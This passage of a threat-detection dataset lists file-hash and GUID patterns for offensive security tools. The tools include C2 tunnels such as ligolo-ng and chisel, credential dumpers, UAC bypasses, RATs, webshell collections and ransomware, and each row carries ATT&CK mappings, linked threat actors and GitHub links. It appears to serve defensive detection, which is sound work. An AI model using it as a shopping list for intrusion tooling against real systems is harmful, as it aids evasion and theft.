domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions.
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","41997" "*e3bd611e8aa3d18d81944ebdabf51ce9aed8eb414a95ee8eb6d45ca0ebd58003*",".{0,1000}e3bd611e8aa3d18d81944ebdabf51ce9aed8eb414a95ee8eb6d45ca0ebd58003.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","42000" "*e3c47e6fe49e0f3905ba47ee21daff40a53ac9c2d18eb452a27812ef054a4cdc*",".{0,1000}e3c47e6fe49e0f3905ba47ee21daff40a53ac9c2d18eb452a27812ef054a4cdc.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42002" "*e3c611553b1544143dd625f75395d57ed0ccc260dc0e6d0204b512a492957050*",".{0,1000}e3c611553b1544143dd625f75395d57ed0ccc260dc0e6d0204b512a492957050.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","42004" "*e3dd6fc036a50de83adba7789cd49d29da75622b4c0f84e0fad8ad97f8880446*",".{0,1000}e3dd6fc036a50de83adba7789cd49d29da75622b4c0f84e0fad8ad97f8880446.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling
tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42005" "*e3de5481632991feec94a6faf2404118c5b8ee31e74fe54594cec8bf2d03c99d*",".{0,1000}e3de5481632991feec94a6faf2404118c5b8ee31e74fe54594cec8bf2d03c99d.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","42006" "*e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba*",".{0,1000}e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","42007" "*e3e70157c3a75c549870c5f2796a64c8de05c3d9f71fbcf76239f07875bff829*",".{0,1000}e3e70157c3a75c549870c5f2796a64c8de05c3d9f71fbcf76239f07875bff829.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","42008" "*e3e89eb47f5d2fec9f3fb1b32e0100d95d4a28d33f85966c217d5a859d4cab94*",".{0,1000}e3e89eb47f5d2fec9f3fb1b32e0100d95d4a28d33f85966c217d5a859d4cab94.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42009" "*e3f63a8456b106e6e8c4801f2c061b1c8d2a205dc3c161e27ead03abbd960300*",".{0,1000}e3f63a8456b106e6e8c4801f2c061b1c8d2a205dc3c161e27ead03abbd960300.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42010" "*e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc*",".{0,1000}e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42011" "*e3f71f6245226059b306c744af8038d045104c2a12aef8f6b6a254d963927e68*",".{0,1000}e3f71f6245226059b306c744af8038d045104c2a12aef8f6b6a254d963927e68.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - 
initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","0","#filehash","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","42012" "*e3v6tjarcltwc4hdkn6fxnpkzq42ul7swf5cfqw6jzvic4577vxsxhid.onion*",".{0,1000}e3v6tjarcltwc4hdkn6fxnpkzq42ul7swf5cfqw6jzvic4577vxsxhid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","42013" "*e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2*",".{0,1000}e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","42014" "*e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2*",".{0,1000}e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42015" "*e409901ebcba3869ad50844d6896bc466ef54546ceb06bd5949d9f667ade3e06*",".{0,1000}e409901ebcba3869ad50844d6896bc466ef54546ceb06bd5949d9f667ade3e06.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload 
Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42017" "*e409a2e884393295c0b3c0e46b918c4b96ce535bbb9c5f81a21946198f6615cf*",".{0,1000}e409a2e884393295c0b3c0e46b918c4b96ce535bbb9c5f81a21946198f6615cf.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42018" "*e415296f956351bc4060d03fa52512415f353e26236b7fd97642f7ef608ca4e9*",".{0,1000}e415296f956351bc4060d03fa52512415f353e26236b7fd97642f7ef608ca4e9.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#filehash","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","42021" "*e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7*",".{0,1000}e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other.
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42023" "*e4221478f87a8403a8db34b908d0b1d42e4b76cec95835364d2310b77cc2615d*",".{0,1000}e4221478f87a8403a8db34b908d0b1d42e4b76cec95835364d2310b77cc2615d.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","42025" "*e42d27145528616d6fe1951421989dbdaf174abe860b90bdc9321f1093593a71*",".{0,1000}e42d27145528616d6fe1951421989dbdaf174abe860b90bdc9321f1093593a71.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","42026" "*e42e1a7fcd23299df2ad4a3fe66e0f1df5a367ffe96015fd3a3b9c0a6dfcefdb*",".{0,1000}e42e1a7fcd23299df2ad4a3fe66e0f1df5a367ffe96015fd3a3b9c0a6dfcefdb.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","42027" "*e42e5cf9-be25-4011-9623-8565b193a506*",".{0,1000}e42e5cf9\-be25\-4011\-9623\-8565b193a506.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - 
APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#GUIDproject","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","42028" "*e43124c3412c5ced1b7c4ba34ecb012904d8b967be3a3ea0f5da507518c1f6a8*",".{0,1000}e43124c3412c5ced1b7c4ba34ecb012904d8b967be3a3ea0f5da507518c1f6a8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42029" "*e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838*",".{0,1000}e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42030" "*e43f95f83949e27b099ea863b18f8fdb42d5c50d58f846051fa15c0cd2e9d491*",".{0,1000}e43f95f83949e27b099ea863b18f8fdb42d5c50d58f846051fa15c0cd2e9d491.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","42032" 
"*e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0*",".{0,1000}e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42033" "*e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00*",".{0,1000}e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42034" "*e45bf8db8dd20bb90ec257016dbe93831b8adbf13b1eb7d4eac496b895b3eddb*",".{0,1000}e45bf8db8dd20bb90ec257016dbe93831b8adbf13b1eb7d4eac496b895b3eddb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42035" 
"*e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784*",".{0,1000}e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42037" "*e46766c1c80ea172d9c38d7d18674d29d9fd294014cf9d8e9557a6b2b3755a77*",".{0,1000}e46766c1c80ea172d9c38d7d18674d29d9fd294014cf9d8e9557a6b2b3755a77.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","42038" "*e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6*",".{0,1000}e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42039" "*e470b90efe8da89e3c118eea1d62eea1f4f0194d82522c7dfb2a07d24471566a*",".{0,1000}e470b90efe8da89e3c118eea1d62eea1f4f0194d82522c7dfb2a07d24471566a.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - 
TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","42040" "*e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595*",".{0,1000}e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42041" "*e47c1d1be0e70b9496873b1b78c7c185320358fa94cd8083e09931de1d82d2ec*",".{0,1000}e47c1d1be0e70b9496873b1b78c7c185320358fa94cd8083e09931de1d82d2ec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42042" "*e47e58d3e21fb5608f890f81474a0354f42d97018d930d93b07fd83ac5c0e5a6*",".{0,1000}e47e58d3e21fb5608f890f81474a0354f42d97018d930d93b07fd83ac5c0e5a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42043" 
"*e4865da7718ce53f800a8a5990b5e3dfccb1350c9ec3831b3fc8c785d7c1bb2e*",".{0,1000}e4865da7718ce53f800a8a5990b5e3dfccb1350c9ec3831b3fc8c785d7c1bb2e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42044" "*e48d5d119ea5afc1586810a87475e8e16e0c7bf21af747ec77396f27ff5ad21a*",".{0,1000}e48d5d119ea5afc1586810a87475e8e16e0c7bf21af747ec77396f27ff5ad21a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42045" "*e48ef8fb95668ad11567f9ed959552466b9fbc796fe8380b312a5d165843048d*",".{0,1000}e48ef8fb95668ad11567f9ed959552466b9fbc796fe8380b312a5d165843048d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42046" "*e497cb13af9ca67fe13e37a81dc416d7cff819402aa46a7232c088e06dc74f92*",".{0,1000}e497cb13af9ca67fe13e37a81dc416d7cff819402aa46a7232c088e06dc74f92.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42048" 
"*e49b696f9356d17861fb7ff0391a72841af546a18b1be587cf0d41dbdac982a4*",".{0,1000}e49b696f9356d17861fb7ff0391a72841af546a18b1be587cf0d41dbdac982a4.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#filehash","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","42050" "*e49c11f8f47b6fe4c3810ad8b5a241638983d7e60d240f70859fd4b7a887c4d6*",".{0,1000}e49c11f8f47b6fe4c3810ad8b5a241638983d7e60d240f70859fd4b7a887c4d6.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42051" "*e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa*",".{0,1000}e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42053" "*e4b3511a69efba9f59592c41a87992f7e23fb6ea45d18eca6ab19bbbb7bb6d6f*",".{0,1000}e4b3511a69efba9f59592c41a87992f7e23fb6ea45d18eca6ab19bbbb7bb6d6f.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","42054" "*e4b3b3e72bd3bf4052a3136cb811ea54923bc2d7807709992e0345743d49ced8*",".{0,1000}e4b3b3e72bd3bf4052a3136cb811ea54923bc2d7807709992e0345743d49ced8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42055" "*e4b3bf84caac8fcf5055b237a3054181c1f6c6d726317e028dcacdaeea0c9e60*",".{0,1000}e4b3bf84caac8fcf5055b237a3054181c1f6c6d726317e028dcacdaeea0c9e60.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - 
TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42056" "*e4b84fd04cf067c5bdcab91f85599ab53671d9eda16a60590886824b8b5e7cab*",".{0,1000}e4b84fd04cf067c5bdcab91f85599ab53671d9eda16a60590886824b8b5e7cab.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42059" "*e4bc4fc4b8f65caedc7302900804da6af5689a7f3a03b31ae62433b24f393568*",".{0,1000}e4bc4fc4b8f65caedc7302900804da6af5689a7f3a03b31ae62433b24f393568.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","42060" "*e4c23b8fe00672ae95277e683f870456debe246e506a7ff47c92c1881c5c7622*",".{0,1000}e4c23b8fe00672ae95277e683f870456debe246e506a7ff47c92c1881c5c7622.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42063" "*e4c4d0282728171ce3f6cd35a92e8cb1ecd95635331b146105f5c81a25ac9c0c*",".{0,1000}e4c4d0282728171ce3f6cd35a92e8cb1ecd95635331b146105f5c81a25ac9c0c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42065" "*e4ce017fd52b2dab10d33e9fbe51dcb8e5b74b496121d8d121d228d5fbdb58e8*",".{0,1000}e4ce017fd52b2dab10d33e9fbe51dcb8e5b74b496121d8d121d228d5fbdb58e8.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","42067" "*e4cfb74b6002861358363025a31d0dd682a1cb67149d6608825f63fe46d01c38*",".{0,1000}e4cfb74b6002861358363025a31d0dd682a1cb67149d6608825f63fe46d01c38.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 